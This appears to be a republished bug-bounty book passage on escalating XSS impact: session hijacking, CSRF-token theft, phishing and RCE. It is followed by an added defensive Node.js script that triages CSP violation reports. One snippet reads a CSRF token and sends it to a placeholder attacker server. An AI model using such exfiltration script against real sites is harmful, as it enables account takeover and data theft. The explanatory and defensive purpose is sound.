
Escalating the Attack

Published on 2024-10-11 20:33:56

The impact of XSS varies because of several factors. For instance, the type of XSS determines the number of users who could be affected. Stored XSS on a public forum can realistically attack anyone who visits that forum page, so stored XSS is considered the most severe. On the other hand, reflected or DOM XSS can affect only users who click the malicious link, and self-XSS requires a lot of user interaction and social engineering to execute, so they are normally considered lower impact.

The identities of the affected users matter too. Let’s say a stored XSS vulnerability is in a site’s server logs. The XSS can affect system administrators and allow attackers to take over their sessions. Since the affected users are accounts of high privilege, the XSS can compromise the integrity of the entire application. You might gain access to customer data, internal files, and API keys. You might even escalate the attack into RCE by uploading a shell or executing scripts as the admin.

If, instead, the affected population is the general user base, XSS allows attackers to steal private data like cookies and session tokens. This can allow attackers to hijack any user’s session and take over the associated account.

Most of the time, XSS can be used to read sensitive information on the victim’s page. Since scripts executed during an XSS attack run as the target page, the script is able to access any information on that page. This means that you can use XSS to steal data and escalate your attack from there. This can be done by running a script that sends the data back to you. For example, this code snippet reads the CSRF token embedded on the victim’s page and sends it to the attacker’s server as a URL parameter named token. If you can steal a user’s CSRF tokens, you can execute actions on their behalf by using those tokens to bypass CSRF protection on the site. (See Chapter 9 for more on CSRF.)

// Read the element that holds the CSRF token (getElementById returns a single
// element, so no index is needed; the original getElementsById does not exist).
var token = document.getElementById('csrf-token');
// Send it to the attacker-controlled server as the "token" query parameter.
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://attacker_server_ip/?token="+token, true);
xhr.send(null);
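How a defender can surface the request the snippet above makes, as an added example that is not from the page or the book: with a Content-Security-Policy that restricts connect-src, the browser blocks the injected XMLHttpRequest and POSTs a violation report instead. This Node.js snippet parses CSP Level 2 reports (constructed samples; the site origin https://app.example and the report endpoint /csp-report are assumptions) and flags the ones that look like script-driven data theft.

```javascript
// Added example, not from the page: triage Content-Security-Policy violation
// reports. With a header such as
//   Content-Security-Policy: default-src 'self'; connect-src 'self'; report-uri /csp-report
// the browser refuses the injected XMLHttpRequest to the attacker's host and
// POSTs a JSON report to /csp-report instead; classifying those reports makes
// the exfiltration attempt visible to the site's defenders.
// Assumption: the application's own origin (constructed for this example).
const ALLOWED_ORIGINS = new Set(["https://app.example"]);
// Directives whose violations point at script-driven exfiltration
// (connect-src: fetch/XHR to another host) or remote code loading (script-src).
const EXFIL_DIRECTIVES = new Set(["connect-src", "script-src"]);

// Parse one CSP Level 2 report body ({"csp-report": {...}}).
function parseCspReport(body) {
  const report = JSON.parse(body)["csp-report"];
  if (!report) throw new Error("not a csp-report document");
  // Prefer effective-directive; older browsers only send violated-directive.
  const directive = (report["effective-directive"] ||
    report["violated-directive"] || "").split(" ")[0];
  return {
    documentUri: report["document-uri"] || "",
    directive,
    blockedUri: report["blocked-uri"] || "",
  };
}

// Origin of a blocked URI, or null for non-URL values such as "inline"/"eval".
function originOf(uri) {
  try { return new URL(uri).origin; } catch (e) { return null; }
}

// Verdict for one parsed report.
function triage(report) {
  if (!EXFIL_DIRECTIVES.has(report.directive)) return "other";
  const origin = originOf(report.blockedUri);
  if (origin === null) return "inline";                // blocked inline script or eval
  if (ALLOWED_ORIGINS.has(origin)) return "misconfig"; // policy blocked our own host
  return "possible-exfil";                             // request to a foreign host
}

// Constructed sample reports: the token exfil request from the snippet above,
// a blocked inline script, and a benign image violation.
const SAMPLE_REPORTS = [
  '{"csp-report":{"document-uri":"https://app.example/profile","violated-directive":"connect-src \'self\'","effective-directive":"connect-src","blocked-uri":"http://203.0.113.5/?token=REDACTED"}}',
  '{"csp-report":{"document-uri":"https://app.example/profile","violated-directive":"script-src \'self\'","blocked-uri":"inline"}}',
  '{"csp-report":{"document-uri":"https://app.example/profile","violated-directive":"img-src \'self\'","effective-directive":"img-src","blocked-uri":"https://cdn.example/a.png"}}',
];

function triageAll(bodies) {
  return bodies.map((b) => triage(parseCspReport(b)));
}
console.log(triageAll(SAMPLE_REPORTS)); // [ 'possible-exfil', 'inline', 'other' ]
```

Chrome truncates cross-origin blocked-uri values to the origin while Firefox sends the full URL, which is why the verdict keys on the origin rather than the path.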

XSS can also be used to dynamically alter the page the victim sees, so you can replace the page with a fake login page and trick the user into giving you their credentials (often called phishing). XSS can also allow attackers to automatically redirect the victim to malicious pages and perform other harmful operations while posing as the legitimate site, such as installing malware. Before reporting the XSS you found, make sure to assess the full impact of that particular XSS to include in your vulnerability report.
